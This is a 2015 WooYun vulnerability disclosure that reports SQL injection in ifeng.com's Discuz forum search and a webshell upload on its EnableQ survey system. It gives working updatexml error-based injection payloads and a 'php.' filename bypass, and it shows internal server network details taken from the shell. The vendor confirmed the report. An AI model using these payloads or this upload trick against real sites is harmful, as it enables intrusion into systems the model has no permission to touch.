当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158311

漏洞标题:凤凰网一处注入+一处Getshell

相关厂商:凤凰网

漏洞作者: 玉林嘎

提交时间:2015-12-04 17:17

修复时间:2016-01-18 18:20

公开时间:2016-01-18 18:20

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-04: 细节已通知厂商并且等待厂商处理中
2015-12-04: 厂商已经确认,细节仅向厂商公开
2015-12-14: 细节向核心白帽子及相关领域专家公开
2015-12-24: 细节向普通白帽子公开
2016-01-03: 细节向实习白帽子公开
2016-01-18: 细节向公众公开

简要描述:

rt

详细说明:

1、注入
http://bbs.auto.ifeng.com/ 搜索处存在注入(discuz x3.1搜索框咋会有注入呢....此处略奇葩 输入' 最后会跳转到 http://bbs.auto.ifeng.com/search.php?mod=forum&searchid=2889&orderby=lastpost&ascdesc=desc&searchsubmit=yes&kw=%27
报错 但是直接访问却不行... 必须从搜索那过来

1.png


2.png


' or updatexml(1,concat(0x3a,version()),1) or '


3.png


' or updatexml(1,concat(0x3a,user()),1) or '


4.png


discuz !3.1过滤 略变态 主要突显一个奇葩..
2、Getshell
http://diaocha.ifeng.com/System/Login.php 凤凰调查系统
第三方应用 EnableQ 调查系统

 WooYun: EnableQ官方免费版存在多处任意文件上传,免登陆可直接getshell 

此前报过很多任意上传漏洞
但是在很多次遇到这个发现都修复了 但是很多次都利用什么解析漏洞 成功shell了 这次的也略奇葩
txt可上传

11.png


php失败

12.png


但是这个点是未更改文件名的 可深入利用
php. 可上传

13.png


http://diaocha.ifeng.com/PerUserData/tmp/test.php.

14.png


竟然解析啦....

/data/ifengsite/htdocs/Enableq10_php53>ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:AF:7E:F1
inet addr:10.32.26.225 Bcast:10.32.26.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:feaf:7ef1/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:715083143 errors:0 dropped:0 overruns:0 frame:0
TX packets:528536981 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:86427444936 (80.4 GiB) TX bytes:141667250767 (131.9 GiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:18943020 errors:0 dropped:0 overruns:0 frame:0
TX packets:18943020 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:8439401597 (7.8 GiB) TX bytes:8439401597 (7.8 GiB)

漏洞证明:

1、注入
http://bbs.auto.ifeng.com/ 搜索处存在注入(discuz x3.1搜索框咋会有注入呢....此处略奇葩 输入' 最后会跳转到 http://bbs.auto.ifeng.com/search.php?mod=forum&searchid=2889&orderby=lastpost&ascdesc=desc&searchsubmit=yes&kw=%27
报错 但是直接访问却不行... 必须从搜索那过来

1.png


2.png


' or updatexml(1,concat(0x3a,version()),1) or '


3.png


' or updatexml(1,concat(0x3a,user()),1) or '


4.png


discuz !3.1过滤 略变态 主要突显一个奇葩..
2、Getshell
http://diaocha.ifeng.com/System/Login.php 凤凰调查系统
第三方应用 EnableQ 调查系统

 WooYun: EnableQ官方免费版存在多处任意文件上传,免登陆可直接getshell 

此前报过很多任意上传漏洞
但是在很多次遇到这个发现都修复了 但是很多次都利用什么解析漏洞 成功shell了 这次的也略奇葩
txt可上传

11.png


php失败

12.png


但是这个点是未更改文件名的 可深入利用
php. 可上传

13.png


http://diaocha.ifeng.com/PerUserData/tmp/test.php.

14.png


竟然解析啦....

/data/ifengsite/htdocs/Enableq10_php53>ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:AF:7E:F1
inet addr:10.32.26.225 Bcast:10.32.26.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:feaf:7ef1/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:715083143 errors:0 dropped:0 overruns:0 frame:0
TX packets:528536981 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:86427444936 (80.4 GiB) TX bytes:141667250767 (131.9 GiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:18943020 errors:0 dropped:0 overruns:0 frame:0
TX packets:18943020 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:8439401597 (7.8 GiB) TX bytes:8439401597 (7.8 GiB)

修复方案:

第三方应用安全...

版权声明:转载请注明来源 玉林嘎@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-12-04 18:12

厂商回复:

非常感谢您对凤凰网信息安全的帮助。

最新状态:

暂无